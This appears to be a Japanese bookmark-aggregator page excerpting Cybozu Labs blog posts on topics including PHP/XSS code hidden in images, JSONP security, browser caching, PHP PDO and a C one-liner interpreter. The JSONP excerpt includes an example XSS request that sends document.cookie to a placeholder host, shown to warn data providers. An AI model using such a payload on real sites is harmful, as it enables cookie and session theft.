TAKESAKO @ Yet another Cybozu Labs: LL魂お疲れ様でした[LLSpirit]
LL魂、参加されたみなさんお疲れ様でした。みなさんのお陰で無事イベントを終了することができました。ありがとうございました。 前半の20枚だけですが、Flickrに写真をアップロードしました。 詳しい感想はのちほど。いろいろ新しい刺激を受けました。 とりいそぎ、Lightning Talksの発表資料(※画像はイメージでしたバージョン)を公開します。 イメージファイト! - 画像に埋め込まれたPHP・XSS攻撃コードと戦う5つの方法 - 11 竹迫良範(Shibuya Perl Mongers) http://wafful.org/mod_imagefight/ImageFight-LL2007.ppt 先日、PHPの攻撃コードが隠された画像ファイルが、大手ホスティングサイトで発見されたとの報道がなされました。GIF,PNG,JPEG,BMP形式の画像ファイルには、PHPのRFI攻撃で使用さ
Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて
« E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
サイボウズ・ラボ : top
サイボウズ・ラボ サイボウズ・ラボはサイボウズグループの研究開発部門として、次世代の製品・サービスの基盤となる技術を中長期視点で研究開発しています。 新着情報 Cybozu Inside Out | サイボウズエンジニアのブログ try! Swift Tokyo 2024 参加レポート (2024-05-06) QAエンジニアがプロダクトオーナーになってみた話 (2024-04-30) ポジティブな気持ちから変化を起こせるチームを作るために意識していること (2024-04-26) 本番に近い状況でクラスをテストする (2024-04-25) 「ソフトウェアテストをカイゼンする50のアイデア」勉強会を開催したら、 濃い議論ができた話 (2024-04-24) 秋元@サイボウズラボ・プログラマー・ブログ このレイオフは存在しない – 架空のCEOのレイオフメッセージをAI生成 (2023-0
Kazuho@Cybozu Labs: キャッシュの上手な使い方
« C-0.05 | メイン | cygwin + mod_perl » 2006年02月08日 キャッシュの上手な使い方 キャッシュといっても、ウェブブラウザやウェブプロキシのキャッシュのことです。 ・Internet Explorer のキャッシュの動作 Internet Explorer は、同一ウィンドウ内で複数回同じウェブページを読み込む場合、2回目以降はキャッシュのデータを使用します (デフォルト設定の場合、 Last-Modified または Expires ヘッダがついている場合のみ)。 つまり、同じウィンドウの中で、 ページA を読み、次にページB を読み、そしてページA を再び読み込むようなケースでは、2回目にページ A を表示する際にはキャッシュのデータが使用され、ウェブサーバへの再問い合わせは行われません。 また、 Last-Modified ヘッダと Expire
TAKESAKO @ Yet another Cybozu Labs: #!/usr/bin/C でワンライナーを書く
Kazuho@Cybozu Labs: C - a pseudo-interpreter of the C programming language Perl や Ruby では、ワンライナーで処理が書けて便利です。でも、なぜか C では書くことができません。仕事上の都合で、小さな処理を C 言語で書く必要があったので、ワンライナーも書くことのできる C 言語のインタプリタ(?)を作ってみました。 面白そうなので、早速RPMパッケージを作ってみました。 Red Hat系Linuxならインストールは以下のコマンド一発です。 # rpm -ivh http://takesako.31tools.com/redhat/RPMS/noarch/C-0.01-0.noarch.rpm こんなことができるようになります。 [1] C言語でワンライナー: C -e 'printf("hello worl
畑@サイボウズ・ラボ - PDO (PHP Data Objects) の使用感
先日、PHP5.1のRC1がリリースされたが、PHP5.1からはデフォルトでネイティブのデータベース抽象クラスであるPDO(PHP Data Objects)が使用できるようになる。PHP5.0.x でもwww.php.netのサイトからPECLのモジュールを取ってきてインストールすれば使える。ということで早めに慣れようと自分のマシンにインストールしてみて使ってみた。 今までMySQLを使用することが多かったため、自然とMySQL用の関数を使用することが多かったが、MySQL用の関数とPDOの使い勝手も多少異なるみたいだ。まあ、PDOはクラスなので当然であるが。PDOではMySQL用の関数と違って、PDO::prepare() でSQLを一度準備して、PDOStatement クラスのインスタンスを作成し、その後 PDOStatement::execute() を呼び出してSQL文を実行す
畑@サイボウズ・ラボ - PHPにおけるRailsの考え方の適用
先日、Ruby on Rails のPHP版であるCakePHPについて触れました。触れたといっても、そういうのがある、という程度でしたが。せっかくなので、PHPにおけるRailsの考え方の適用について、少しばかり考えてみました。 RailsはMVCに基づいたフレームワークということで、Modelを担当するActiveRecordと、ControlとViewを担当するActionPackというふたつのライブラリで構成されています。Rails自体の特徴はその他にも多くありますが、今回はこの2つに部分についてCakePHPでの実装を基にPHPに適用した際の有用性について考えてみました。 まず、ActionPackというかControllerの部分についてですが、PHPの場合、ページと.phpファイルが1対1対応しているのが直感的で分かりやすいので、Controllerのクラスに各ページに対応し
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
